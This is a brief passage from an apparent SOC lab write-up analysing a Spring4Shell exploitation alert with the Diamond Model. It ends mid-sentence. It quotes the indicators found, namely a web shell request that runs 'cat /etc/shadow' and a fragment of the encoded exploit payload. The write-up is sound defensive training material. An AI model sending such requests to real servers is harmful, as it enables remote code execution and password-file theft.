Diamond Model of Intrusion Analysis in Practice
3 min readMay 30, 2022
LetsDefend: SOC171-Spring4Shell
Log Analysis
Spring4Shell 0-Day Vulnerability is a Remote Code Execution (RCE) vulnerability. According to public information, a successful exploitation would enable the Threat Actors to have arbitrary file upload privilege.
Suspicious parameter & detection rules triggered:
- /tomcatwar.jsp?pwd=j&cmd=cat%20/etc/shadow
- java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di payload in POST data
An attacker has conducted port scanning and then tried to exploit the service on port 8082 with the “Spring4Shell” vulnerability. Assuming the attack…
